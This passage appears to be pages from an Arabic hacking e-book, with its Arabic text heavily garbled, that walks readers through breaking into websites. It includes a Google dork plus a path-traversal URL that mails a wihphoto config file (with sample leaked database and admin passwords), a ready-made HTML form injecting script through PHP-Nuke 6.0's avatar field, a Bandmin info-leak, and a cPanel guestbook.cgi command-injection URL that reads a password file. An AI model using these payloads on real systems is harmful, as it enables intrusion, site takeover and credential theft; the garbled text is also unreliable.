‫ﺘﺪى‬ ‫ﺘﻚﺑﺎﻟﻤﻨ‬‫ﻗﻢ ﻋ ﻀﻮﯾ‬ ‫ﺛﻢﺑﺎﻟﻤ ﺮﺑﻊاﻟﺠﺎﻧﺒﻲ ﺷﻊ ر‬
‫أ ﺿﻐﻂ زر ‪submit‬‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺨﺎ ﺻﺔﺑﻚ‬ ‫ﺑﻌﺪﻫﺎ ﺳﻮ فﺗﺎﺗﯿﻚ ﺷﺎﺷﺔﺗﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ ل ﺿﻊاﺳﻢاﻟﻤﺴ‬
‫ﺘﺪاك‬‫ﺘﺪى ﻣﻨ‬ ‫ﺘﺪى !!أﻓﻌ ﻞ ﻣﺎﺗ ﺮﯾﺪاﻟﻤﻨ‬ ‫ﺛﻢ ﺳﻮ فﺗﺠﺪ ﻧﻔﺴﻚﻓﻲﻟﻮ ﺣﺔﺗ ﺤﻜﻢاﻟﻤﻨ‬
‫ﺘﻮ ﺳﻬﻮﻟ ﺖاﻟﺪرس وﻫﻮ ﺻ ﺮاا ﺣﻪ ﻣﻨﻘﻮ لﺑ ﺲﺗﻌ ﺮﻓﻮ ﻣﺎ ﺣﺒﯿ ﺖاﻧﺰﻟﻪاﻻ وﻋﻠﯿﻪﺗﻄﺒﯿ ﻖ‬ ‫ﺘﻜﻢ ﺷﻔ‬ ‫وﺳﻼاااﻣ‬

‫ﺘﺪا ذا‬
‫ﺷﻮوﻓﻮواﻟﻤﻨ‬

‫‪http://forums.xos.ca/‬‬

‫ﻗﯿﻪ‪...‬‬
‫ﻗﻊاﻟﺒﺎا‬
‫ﺗﺪﻣ ﺮ واﻟ ﺤﻤﺪ ﷲ ﻋﻘﺒﺎ لاﻟﻤﻮا‬

‫‪٢ ٤٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"ﺛﻐﺮة ﲨﯿﻠﺔ ﰲ ‪ php‬ﰲ اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﻮﻓ ﺮهﻓﻲاﻏﻠﺐ‬ ‫ﺘﻤﺪ ﻋﻠﻰاﻟﺒ ﺤﺚاﻟﻌﺸﻮاﺋﻲ وﻫﻲ ﻣ‬ ‫ﺘﺒ ﺮ ﻫﺬهاﻟﺜﻐ ﺮة ﺟﻤﯿﻠﻪ وﻣﯿﺴ ﺮه وﺳﻬﻠﻪ ﺟﺪا وﻫﻲﺗﻌ‬ ‫ﺗﻌ‬
‫ﺘﻬﺪﻓﻪ‪...‬‬ ‫ﻗﻊاﻟﻤﺴ‬ ‫اﻟﻤﻮا‬
‫ﺑﺴﻢا ﷲ ﻧﺒﺪأ‪،،،‬‬
‫ﺘﻨﺎاﻷﺳﺎﺳﯿﺔﻓﻲ ﻫﺬهاﻟﺜﻐ ﺮهاﻟﺒ ﺤﺚﻗﻲ ﺟﻮﺟ ﻞاوﻓﻲأي ﻣ ﺤ ﺮكﺑ ﺤﺚا ﺧ ﺮ‬ ‫ﻣﻬﻤ‬
‫ﻗﻊاﻟﻤﺼﺎﺑﻪﺑﻬﺎ !!!‬ ‫ﺘ ﺞﻟﻨﺎ ﻋﺪدﻛﺒﯿﯿﯿﯿﯿﯿﯿ ﺮ ﻣﻦاﻟﻤﻮا‬‫ﺳﻮ ف ﻧﺒ ﺤﺚ ﻋﻦﻛﻠﻤﻪ وﺳﯿﻨ‬
‫ﺘ ﺮأي وا ﺣﺪ ﻣﻨﻬﺎ‬
‫ﻗﻊﻛﺜﯿ ﺮا ﺧ‬‫ﺘﺐ "‪ "powered by wihphoto‬ﺳﻮ ف ﯾﺠﺪﻟﻨﺎ ﻣﻮا‬ ‫اذﻫﺐاﻟﻰ ﺟﻮﺟ ﻞ واﻛ‬
‫ﺑﻌﺪ ذﻟﻚ ﻋﻠﯿﻚ‬
‫ﻗﻊ ‪http://www .*****.com/wihphoto/index.php‬‬ ‫ﺘﺎﻟﻲ ﻣﻦ ﻋﻨﻮاناﻟﻤﻮ‬ ‫ﺑ ﺤﺬ فاﻟ‬
‫ﺳﻮ ف ﻧﻘﻮمﺑ ﺤﺬ فﻫﺬهاﻟﻜﻠﻤﻪ ‪ index.php‬وﻧﺴﺒﺪﻟﻬﺎﺑﻬﺬااﻟﻌﻨﻮان‬
‫‪sendphoto.php?album=..&pic=config.inc.php‬‬
‫ﺘﺐﺑ ﺮﯾﺪ ﻣﺜﻼ‬‫ﺳﻮ فﺗﻈﻬ ﺮﻟﻨﺎ ﺻﻔ ﺤﻪ ﯾﻄﻠﺐﻓﯿﻬﺎاد ﺧﺎ لاﻟﺒ ﺮﯾﺪاﻟﺬيﺗ ﺮﯾﺪارﺳﺎ ل ﻣﻠ ﻒاﻟﻜﻮﻧﻔ ﺞﻟﻪ ‪ ..‬اﻛ‬
‫‪maxhak2000@hotmail.com‬‬
‫ﺘﺠﺪﻓﯿﻬﺎ ﻣﻠ ﻒ ﻣ ﺮﻓ ﻖا ﺿﻐﻂ ﻋﻠﯿﻪ وﺷﻐﻠﻪ ‪ ###‬را ح ﯾﺠﯿﻚﻛﻼامﻛﺜﯿ ﺮ‬ ‫ﺘﻈ ﺮ ذواﻧﻲ ﺳﻮ فﺗﺼﻠﻚ رﺳﺎﻟﻪ ﺳ‬ ‫اﻧ‬
‫ﺘﻔﯿﺪ ﻣﻨﻪاﻛﺜ ﺮ ﺷﻲ ءﻫﻮ ﻫﺬا‬ ‫اﻟﺸﻲ ءاﻟﻲ را ح ﻧﺴ‬

‫‪// MySQL-DB Einstellungen‬‬


‫====================== ‪//‬‬
‫‪$database = "usr_web1_5"; //MySQL Datenbankname‬‬ ‫ﺎﺳﻢﻗﺎﻋﺪة >>>‬
‫اﻟﺒﯿﺎﻧﺎ ت‬

‫‪$sqlhost = "localhost"; //MySQL Hostname‬‬ ‫ﻋﻨﻮانﻗﺎﻋﺪة >>>‬


‫ﻗﻊ (‬‫اﻟﺒﯿﺎﻧﺎ ت)ﻓﻲﺑﻌ ﺾاﻷ ﺣﯿﺎن ﯾﻜﻮن ﻋﻨﻮاﻧﻬﺎ ﺧﺎرﺟﻲ ﯾﻌﻨﻲ ﻣﺎﻫﻲ ﻋﻠﻰاﻟﻤﻮ‬

‫‪$sqluser = "web1"; //MySQL Username‬‬ ‫ﺘﺨﺪم >>>‬ ‫ﺎﺳﻢاﻟﻤﺴ‬


‫ﺣ ﻖﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت‬

‫‪$sqlpass = "q+q27rym"; //MySQL Passwort‬‬ ‫ﺎﻟﺒﺎﺳﻮردﺗﺒﻊ >>>‬


‫ﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت‬

‫‪// Passwort zum hinzufügen von Bildinformationstext‬‬


‫========================= ‪//‬‬
‫=======================‬
‫;"‪$adminpass= "galleriemaster‬‬ ‫ﺎﻟﺒﺎﺳﻮردﺗﺒﻊ >>>‬
‫ﻣﺪﯾ ﺮاﻟﺼﻮر‬

‫‪٢ ٤١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻲ ﻋﻠﯿﻨﺎ د ﺣﯿﻦ ﻧﺪ ﺧ ﻞ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تاو ﻧﺪ ﺧ ﻞ ﻋﻠﻰ‬ ‫ﺘﺎﺟﻬﺎﻛﻠﻬﺎاﻟﻲﺑﺎ‬ ‫اوﻛﻲاﻵن ﺟﺒﻨﺎاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻲ ﻧ ﺤ‬
‫ﺘﺎﻟﻲ‪::‬‬‫ﺘﺒﻊاﻟﯿﻨﻚاﻟ‬ ‫اﻟﺼﻮرﻟﻠﺪ ﺧﻮ ل ﻋﻠﻰاﻟﺼﻮر ﻧ‬
‫‪http://www.*****.com/wihphoto/admin.php‬‬
‫وﻧ ﻀﻊاﻟﺒﺎﺳﻮرد ﺣ ﻖ ﻣﺪﯾ ﺮﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت وﻧﻌﺪ لﻓﻲاﻟﺼﻮر زي ﻣﺎﻧﺒﻐﻰ ‪....‬‬
‫ﻗﻪﻛﺎﻣﻼ ﻫﻨﺎكﺑﻌ ﺾاﻟﻄ ﺮ قﻟﻔﻌ ﻞ ذﻟﻚ‬ ‫ﺘ ﺮا‬
‫ﻗﻊﻛﺎﻣﻼاوا ﺧ‬ ‫ﺘﻼكاﻟﻤﻮ‬ ‫ﻫﻨﺎكﺑﻌ ﺾاﻷﺷﺨﺎ صاﻟﺬﯾﻦ ﯾ ﺮدﯾﺪوناﻣ‬
‫‪:::‬‬
‫ﺘﺨﺪم ﻣﻮ ﺣ ﻖاﻟﺼﻮر‬ ‫أوﻻ‪/‬اد ﺧ ﻞ ﻋﻦ ﻃ ﺮﯾ ﻖاﻷ فﺗﻲﺑﻲ ‪ FTP‬وﻧﺪ ﺧ ﻞاﻟﺒﺎﺳﻮرد ﺣ ﻖاﻟﻤﺪﯾ ﺮ واﺳﻢاﻟﻤﺴ‬
‫ﺑﻌ ﺾاﻷ ﺣﯿﺎنﺗﻨﺠﺢاذاﻛﺎناﻷﺳﻢ واﻟﺒﺎﺳﻮرد ﻣﻄﺎﺑ ﻖﻟﻠﺒﺎﺳﻮرد ﺣ ﻖ ﻣﻠ ﻒاﻟﻜﻮﻧﻔ ﺞ‪.‬‬
‫ﺘﻄﯿﻊ ﻣﻦ‬ ‫ﻗﻊ ﻋﻦ ﻃ ﺮﯾﻘﻬﺎ ﻫﻨﺎكﺑ ﺮاﻣ ﺞﺗﺴ‬ ‫ﺘﻼكاﻟﻤﻮ‬ ‫ﺛﺎﻧﯿﺎ‪ /‬ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﺪ ﺧﻮ لﻟﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت واﻟﻌﺐﻓﯿﻬﺎ واﻣ‬
‫ﺧﻼﻟﻬﺎاﻟﺪ ﺧﻮ ل ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ ‪ MySQL Front‬وﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﺟﯿﺪأو ﻋﻦ ﻃ ﺮﯾ ﻖ‬
‫اﻷﻛﺴ ﺲ وﻏﯿ ﺮﻫﺎ ﻣﻦاﻟﻄ ﺮﯾ ﻖ واﻟﺒ ﺮاﻣ ﺞ ‪....‬‬

‫‪٢ ٤٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪" php nuke‬‬ ‫" ﺛﻐﺮة ﰲ‬

‫‪$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ :‬اﯾﺴ ﺮ‬
‫‪$$$$$$$$‬‬

‫ﺘﻤ ﻞ ﻮاﻟﺠﺎﻓﺎﺑﺪ ل‬
‫ﺘﯿﺢﻟﻚﺗﻨﻔﯿﺬاﻛﻮاداﻟﻬ‬
‫ﻗﻮﻟﻜﻢ ﻋﻠﯿﻬﺎ ‪..‬اﻟﺜﻐ ﺮه ديﺗ‬
‫ﻓﯿﻪﺛﻐ ﺮهﻓﻲا ل ‪ php nuke‬ﺣﺒﯿ ﺖا‬
‫ﻣﻜﺎناﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪ ‪.......‬‬

‫ﺘﻌﻮد ‪-‬‬
‫ﺘﻤﻨﻲﺑﺎﻛﺜ ﺮاﻻﻟﻔﺎظاﺑﺎ ﺣﻪ ‪-‬ﺑ ﺲ ﻋﺎدياﻧﺎ ﻣ‬
‫ﺎﻧﺎ ﻋﺎر فاﻧﻜﻢاو ل ﻣﺎﺗﻘ ﺮوااﻟﺴﻄ ﺮ ﺎﻻو لاﻛﯿﺪاﻏﻠﺒﻜﻢ ﺣﯿﺸ‬
‫ﺘﻤ ﻞ و ﺟﺎﻓﺎﺑﺪ لاﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪ ؟؟؟!!!!ﺑ ﺲ‬ ‫و ﯾﻘﻮ لاﯾﻪ ﺪهﺑﺎهﻫﻮ ﻣﺪ ﺧﻠﻨﺎ ﻫﻨﺎ ﻋﺸﺎن ﯾﻘﻮﻟﻨﺎﺗﻨﻔﯿﺬاﻛﻮاد ﻫ‬
‫؟؟؟!!!اﻣﺎ ﻋﺒﯿﻂاوي !!!‬

‫ﻟﻜﻦﻓﻲا ﺧ ﺮاﻟﻤﻮ ﺿﻮ ع ﺣﻘﻮﻟﻜﻢ ﻣﻤﻜﻦﺗﻌﻤﻠﻮاﺑﯿﻬﺎاﯾﻪ ‪.....‬‬

‫ﺘ ﺮﻣﻪﻟﻢﺗﯿﺠﻲﺗﻌ ﺮ ضﺛﻐ ﺮه (‬
‫ﺘﻲاﻟﻤ ﺤ‬
‫ﻗﻊ ﺎﻟﺴﯿﻜﯿﻮرﯾ‬
‫ﺘﺎﻟﻲ ‪ ) :‬ﺳﺎ ﺣﺎو لاﻧﻲاﻋﻤ ﻞ زي ﻣﻮا‬
‫ﺎﻟﻤﻬﻢاناﻟﺜﻐ ﺮهﻛﺎﻟ‬

‫ﺎﻻﺻﺪارا تاﻟﻤﺼﺎﺑﻪ ‪:‬‬

‫ﻗ ﻞ ﻣﻨﻬﺎ‬
‫‪ PHP Nuke versionh 6.0‬ﻮاﻻ‬

‫ﺘﺨﺪام ‪:‬‬
‫ﺎﻻﺳ‬

‫ﺘﻤ ﻞ واﻟﺠﺎﻓﺎ ﺳﻜ ﺮﯾﺒ ﺖ ﻣﻦ ﺧﻼ ل ﻣﻜﺎن ﺻﻮرﻫﻢاﻟﺸﺨﺼﯿﻪ‪.‬‬


‫ﺘﺨﺪمﻛﻤﺎﻗﻠ ﺖﻓﻲﺗﻨﻔﯿﺬ ﺎﻛﻮاداﻟﻬ‬
‫ﺗﺴ‬

‫ﻣﻠﺨ ﺺ ﻋﺎمﻟﻠﺜﻐ ﺮه‪:‬‬

‫ﺘﯿﺎر ﺻﻮره ﺷﺨﺼﯿﻪ و ذﻟﻚ ﻣﻦ ﺧﻼ ل ﻣﺠﻤﻮﻋﻪ‬


‫ﺘﺴﺠﯿ ﻞﻓﻲاﻟﻤﺠﻠﻪﻓﺎﻧﻪ ﯾﻄﺎﻟﺐﺑﺎ ﺧ‬
‫ﺘﺨﺪم ﻋﻨﺪم ﯾﻘﻮمﺑﺎﻟ‬
‫اي ﻣﺴ‬
‫ﻣﻦاﻟﺼﻮراﻟﻤﻮﺟﻮدهﻓﻲاﻟﻤﺠﻠﺪﻫﺬا‪/images/forum/avatars ....‬‬

‫ﺘﻄﺎ ع‬
‫ﻋﻨﺪﺋﺬﺗﻘﻮماﻟﻤﺠﻠﻪﺑﻮ ﺿﻊاﺳﻢاﻟﺼﻮرهﻓﻲاﻟﺪاﺗﺎﺑﯿﺰ ‪ ..‬وﻟﻜﻨﻬﺎ ﻻﺗﻘﻮمﺑﻮ ﺿﻊايﻛﻮداياﻧﻪاذااﺳ‬
‫ﺘﯿﺎراﻟﺼﻮرهاﻟﺸﺨﺼﯿﻪاﻟﻰ‬ ‫ﺘﻄﺎ عان ﯾﻐﯿ ﺮ ﺻﻨﺪو قا ﺧ‬‫اي ﯾﻮزران ﯾ ﺤﺼ ﻞ ﻋﻠﻰﻛﻮدﻓﻮرماﻟﻤﺠﻠﻪ واﺳ‬
‫ﺘﻤ ﻞاﻟﻠﻲ ﻫﻮه ﻋﺎﯾﺰه !!!!‬‫ﺘﺐﻛﻮداﻟﻬ‬ ‫ﺘﻘﺪاﻧﻪ ﻣﻤﻜﻦان ﯾﻜ‬
‫ﺻﻨﺪو ق ‪ text‬ﻋﺎدي ‪..‬اذناﻋ‬
‫ﺎﻻﻛﺴﺒﻠﻮﯾ ﺖ‪:‬‬
‫ﺘﺴﺠﯿ ﻞﻓﻲاﻟﻤﺠﻠﻪ واﻟﺪ ﺧﻮ لﺑﻌﺪ ذﻟﻚ واﻟﺬﻫﺎباﻟﻰ ﺻﻔ ﺤﻪ ‪ Your Account‬ﻮ ﻣﻨﻬﺎ‬ ‫ﺎوﻻ ﻋﻠﯿﻚ نﺗﻘﻮمﺑﺎﻟ‬
‫اﻟﺬﻫﺎب ﺎﻟﻰ ﺻﻔ ﺤﻪ ‪Your Info‬ﺑﻌﺪ ذﻟﻚ ﻋﻠﯿﻚﺑﺎﻇﻬﺎر ﺳﻮرسﻛﻮداﻟﺼﻔ ﺤﻪ ﻣﻦ ﺧﻼ ل ‪ view source‬ﻮ‬
‫ﺎﻟﺒ ﺤﺚ ﻋﻦﻛﻠﻤﻪ‪uid‬‬

‫ﻗﻲ ﺣﺎﺟﻪ زيﻛﺪه ‪:‬‬


‫ﻻزمﺗﻼ‬

‫>"‪<input type="hidden" name="uid" value="2111‬‬

‫‪٢ ٤٣‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

... ٢١١١ ‫ﻗﻢاﻻي دياﻟﻠﻲ ﻫﻮهﻓﻲاﻟﻤﺜﺎ لﻛﺎن‬ ‫ﻛﺪه ﯾﺒﻘﻰاﻧ ﺖ ﻋ ﺮﻓ ﺖ ر‬


‫ ﻣﻊ ﻣﻼ ﺣﻈﻪﺗﻐﯿﯿ ﺮ‬html ‫ﺘﺪاد‬‫ﻋﻠﯿﻚﺑﻌﺪ ذﻟﻚ ﻧﻚﺗ ﺤﻔﻆاﻟﻜﻮد دهﻓﻲاﻟﻨﻮ تﺑﺎد وﺗﺴﻤﯿﻪ ﺎياﺳﻢﺑﺎﻣ‬
:...... ‫ ﺎﻟﻰ ﻋﻨﻮاناﻟﻤﺠﻠﻪاﻟﻬﺪ ف‬http://nukesite/

<!-- START CODE --!>


<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account"
method="post">

<b>Code ('">[code]<b ')</b><input type="text"


name="user_avatar" size="30"
maxlength="30"><br><br>

<b>Username</b><input type="text" name="uname" size="30"

maxlength="255"><br><b>User ID:<input type="text"


name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>

‫ﺘﺎﺑﻪاﻟﻜﻮداﻟﻤﻄﻠﻮوبﺗﻨﻔﯿﺬه ﻣﻊ ﻣ ﺮاﻋﺎه ﺎﻧﻪ ﯾﺠﺐ‬


‫او ل ﺧﺎﻧﻪ ﻋﻠﯿﻚﻛ‬.. ‫ﻫﺬا‬html ‫ﻮاﻻن ﻋﻠﯿﻚﺗﺸﻐﯿ ﻞ ﻣﻠ ﻒا ل‬
: ‫ن ﯾﺒﺪأﺑﺎﻟﻌﻼﻣﻪ‬

">

‫ﺘﻬﻲﺑﺎﻟﻌﻼﻣﻪ‬
‫ﻮ ﻣﻤﻜﻦ ﯾﻨ‬
<b

‫ﻗﻢاﻻي دي وﺑﻌﺪﯾﻦ‬ ‫ ﺿﻊﺑﻌﺪﻛﺪهاﺳﻢ ﺎﻟﯿﻮزر و ر‬... ‫ﺘﻰ ﻻﺗﺠﺪاي ﻣﺸﺎﻛ ﻞﻓﻲاﻟﻜﻮد ﻋﻨﺪاﻟﻌ ﺮ ض‬
‫ﺣ‬
!!!! ‫ ﻮﻛﺪهاﻟﻜﻮدﺗﻢﺗﺸﻐﯿﻠﻪ‬..‫ ﺎﻟﺨﺎﺻﻪﺑﻚ‬Your Account ‫ ﺳﻮ فﺗﺠﺪ ﻧﻔﺴﻚﻓﻲ ﺻﻔ ﺤﻪ‬submit

:‫ﺘﺒﻪ ﻣﺜﻼ‬
‫ﻣﺜﺎ لﻟﻠﻲ ﻣﻤﻜﻦﺗﻜ‬

"><h1>TESTING</h1><b

!!.... ‫ ﻣﻜﺎن ﺻﻮرﺗﻚاﻟﺸﺨﺼﯿﻪ‬TESTING ‫ﻃﺒﻌﺎ ده ﺣﯿﻄﺒﻊاﻟﻜﻠﻤﻪ‬

٢ ٤٤
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺧﻠﻲﺑﺎﻟﻚانﻓﯿﻪ ﻣﺴﺎﻓﻪﺑﻌﺪاﻟﻌﻼﻣﻪ‬

‫‪"<b‬‬

‫ﺧﻠﻲﺑﺎﻟﻚ ﻣﻨﻬﺎ واﻻ ﺳﻮ فﺗﺠﺪﺑ ﺮوﻛﯿﻦﻛﻮد ‪..‬‬

‫ﺘ ﺮ ‪....‬‬
‫ﻗﺼﻰ ﺣﺪﻟﻠﻜﻮداﻟﻠﻲ ﻣﻤﻜﻦاﻧﻚﺗﺸﻐﻠﻪ ﻫﻮ ‪٣٠‬ﻛ ﺮاﻛ‬ ‫ﺎ‬
‫ﻗﻮﻟﻪاﻧﻚ ﻣﻤﻜﻦﺗﻨﻔﺬﺛﻐ ﺮا ت ‪ xss‬ﺎواي ﺣﺎﺟﻪاﻧ ﺖ ﻣ ﺶ ﻋﺎر فﺗﻨﻔﺬﻫﺎﺑﺴﺒﺐاﻏﻼ قﻛﻮد‬ ‫ﺎﻟﻠﻲاﻧﺎﻛﻨ ﺖ ﻋﺎﯾﺰا‬
‫ﺘﻤ ﻞاﯾﺎه =(ﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت راﺟﻊاﻟﺪرس ﻫﺬاﻛﻤﺜﺎ لﻟﯿ ﺲاﻛﺜ ﺮ ؟؟‪...‬‬‫اﻟﻬ‬

‫‪٢ ٤٥‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" Bandmin 1.4 ‫" ﺛﻐﺮه ﰲ‬

$$$$$$$$$$$$
‫ ﺣﺰماﻟﻈﺎﻣﻲ‬:‫اﻟﻜﺎﺗﺐ‬
$$$$$$$$$$$$

.‫ﺑﺴﻢا ﷲاﻟ ﺮ ﺣﻤﻦاﻟ ﺮ ﺣﯿﻢ‬

(( cPanel exploit not being fixed ))

‫ﻗﻠ ﺖاﻧﺸ ﺮﻫﺎ‬


‫ﺘﻬﺎ ﻣﻊأ ﺧﻲاﻟ ﺤﺒﯿﺐﻫﯿﻜ ﺲ ﻣﻦأﯾﺎم و‬
‫ﻗﺸ‬‫ﻗﺪﺗﻨﺎ‬
‫ﺘﺸﺎﻓﻬﺎ ﻣﻦ ﻣﺪة و‬‫ﺎﻟ ﺤﻘﯿﻘﺔاﻟﺒﺪاﯾﺔ ﻫﺬهاﻟﺜﻐ ﺮهﺗﻢاﻛ‬
... ‫ﻗﻊ ﻣﻨﻬﺎ‬
‫ﻣﻦﺑﺎب ﺎﻟﻔﺎﺋﺪة وﻟﯿ ﺤﺬرا ﺻ ﺤﺎباﻟﻤﻮا‬

‫ﺘﺪﻧﺎﻫﺬهاﻻﯾﺎم ﻋﻠﻰ‬‫ ( ﻮﻫﻲﺛﻐ ﺮه ﺳﻲﺑﺎﻧ ﻞﻛﻤﺎاﻋ‬Bandmin 1.4 ) ‫ﺎﻟﺜﻐ ﺮه ﻫﻲﻓﻲ ﻣﺪﯾ ﺮاﻟﺒﺎﻧﺪوﯾﺚ‬
... ‫اﻟﻤﺨﺎ ﻃ ﺮاﻟﺠﺪﯾﺪة ﻣﻦ ﺳﻲﺑﺎﻧ ﻞ‬
‫ﻗﻊ ﻋﻠﻰاﻟﺨﺎدم‬‫ ﯾﻤﻜﻦ ﻋﻦ ﻃ ﺮﯾﻘﻪ ﻣﻌ ﺮﻓﺔ ﺟﻤﯿﻊاﻟﻤﻮا‬... ‫ﻮﻫﺬهاﻟﺒ ﺮﻧﺎﻣ ﺞ ﯾﻌﻄﯿﻚﺗﻔﺎﺻﯿ ﻞ وإ ﺣﺼﺎﺋﯿﺎ ت ﺷﻬ ﺮﯾﺔ‬
‫ﺘﺜﻤ ﺮﺑﻄ ﺮ قأ ﺧ ﺮى‬
‫ً وﯾﻤﻜﻦأنﺗﺴ‬ ‫أﯾ ﻀﺎ‬

... ‫ﻋﻤﻮﻣﺎإذاﺗ ﺮﯾﺪﺗﻨﻔﺬاﻟﺜﻐ ﺮهﻓﻬﺬا ﻣﺜﺎ لﻟﻬﺎ‬

http://yourdomain.con/bandwidth/

: ‫ﺘﺎﻟﻲ‬
‫ﻮ ﻃ ﺮﯾﻘﺔإﻏﻼ قاﻟﺜﻐ ﺮهﻛﺎﻟ‬

...‫ (ﻓﻲ ﻫﺬااﻟﻔﻮﻟﺪر‬.htaccess ) ‫ﺘﺼﺎر ﺿﻊ ﻣﻠ ﻒ‬


‫ﻮﺑﻜ ﻞا ﺧ‬
/usr/local/bandmin/htdocs

......‫ﺘﻔﺎﺻﯿ ﻞ ﻋﻦﻫﺬهاﻟﺜﻐ ﺮه‬


‫ﻮإﻟﯿﻜﻢ ﻫﺬهاﻟ‬

*************************

Notice:
Any Resellers or Dedicated hosts that use cPanel you should be aware
that there is still an exploit people are using to see what domains are
hosted on the server.

If you have cPanel/WHM on your server, just go to your domain and put
Hopefully you http://yourdomain.con/bandwidth//bandwidth/ after it.
will get a “ You don't have permission to access /bandwidth/ on this
server” message or it will ask for a password.

Otherwise you will be at a page titled “ Bandmin 1.4 (what ever

٢ ٤٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

version)” from here you can access the monthly stats with a list of all
domains with over 1MB of transfer.

The fix are listed below:


Make a TXT file with these lines in it: Use your servers IP# for the XXX

allow from xxx.xxx.xxx.xxx


deny from all

Name it .htaccess and place it in the servers /usr/local/bandmin/htdocs


directory. This will block all but the IP that you use in the .htaccess file.

*************************

‫ﺘﻬﺎاﻻن‬
‫ﻗﻊ ﺎﻏﻠ‬
‫ﺘﻢ ذﻛ ﺮﻫﺎﻟﻜﻦاﻏﻠﺐاﻟﻤﻮا‬
‫ﺘﻲﻟﻢ ﯾ‬
‫اﻣﺎﻓﯿﻮﺟﺪﺛﻐ ﺮةاﻟﺴﻲﺑﺎﻧ ﻞاﻟ‬

cgi-sys/guestbook.cgi?user=cpanel&template

‫ﻗﻊ‬‫ﺘﺐ ﻫﺬا ﺎﻟ ﺮاﺑﻂﺑﻌﺪاﺳﻢاﻟﻤﻮ‬‫ﺗﻜ‬


| ‫ﺘﺐاﻻﻣ ﺮﺑﺎﻟﻠﯿﻨﻜ ﺲ‬ ‫ﻮﻟﻜﻦﺑﻌﺪ ﻋﻼﻣﺔ =|ﺗﻜ‬
‫ﻗﻊ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ‬‫ﺘﻌ ﺮا ضﺑﺎﺳﻮرد ﻣﻮ‬ ‫ﻷﺳ‬
‫ﻣﺜﻼ‬
/cgi-sys/guestbook.cgi?user=cpanel&template=|cat
/home/XXX/public_html/_vti_pvt/service.pwd|

‫ﺘﻌ ﺮا ض ﻫﺬااﻟﻤﻠ ﻒ ﻣﻊ ﻣﻼ ﺣﻈﺔ‬ ‫ﻮﻫﺬااﻻﻣ ﺮﻟﻜﻲاﺳﻬ ﻞ ﻋﻠﻰاﻟﺒﻌ ﺾاﺳ‬


][‫ﺘﻌ ﺮا ض ﻣﺎﺑﺪا ﺧ ﻞاﻟﻤﻠ ﻒ‬‫ﻮﻫﻮاﺳ‬ls ][
html][‫ ﺎو‬php ‫ﺘﻌ ﺮا ض ﺻﻔ ﺤﻪ دا ﺧ ﻞ ﻣﻠ ﻒ ﺳﻮا ءﻛﺎﻧ ﺖ‬ ‫ﻮﻫﻮاﺳ‬cat ][
‫ﺗ ﺮى ﺻﻼ ﺣﯿﺎﺗﻚﻓﻲ رؤﯾﺔ ﻫﺬهاﻟﺼﻔ ﺤﻪ وﯾﻤﻜﻨﻚ ذاﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻫﺬااﻻﻣ ﺮ‬vi ][
‫ﺘﻌ ﺮا ض‬
‫ﺘﻔﺼﯿ ﻞ ﻫﻮاﺳ‬ ‫ﻫﺬااﻻﻣ ﺮ ﯾ ﻀﻬ ﺮﻟﻚاﻟﻤﻠﻔﺎ ت وﻟﻮ ﺟﯿ ﺖﺗﻘ ﺮاهﺑﺎﻟ‬ls -al
‫ﻗﻮﻟﻚﺗﻌﺎ ل‬‫ﺘﻬﺎﻟﻮ ﺟﯿ ﺖﺗﻘﻮ لﻛﯿ ﻒا‬ ‫ﺘﻲ ﯾﺴﻤﺢﻟﻚﺑ ﺮؤﯾ‬ ‫ﺮؤﯾﺔاﻟﻤﻠﻔﺎ تاﻟ‬
‫ ﻮﻫﻮ ﯾ ﻀﻬ ﺮﻟﻚاﻣﺎمﻛ ﻞ ﻣﻠ ﻒ ﻋﺪ تﻓ ﺮاﻏﺎ تاذاﻛﺎن‬al ‫ﺘﻌ ﺮا ض‬ ‫ﻫﻮاﺳ‬ls
‫ﺎو لﻓ ﺮا غﻓﯿﻬﺎ ×ﻓﻤﺎﺗﻘﺪرﺗﺸﻮﻓﻪ‬

‫ﺎﻟ ﺤﯿﻦﺑﺪ ﺧ ﻞ ﻣﻌﺎﻛﻢﻓﻲﺗﻔﺼﯿ ﻞ ﻣﻤ ﻞﻟﻸﻣ ﺮ‬

][=========][

cat /home/XXX/public_html/_vti_pvt/service.pwd

٢ ٤٧
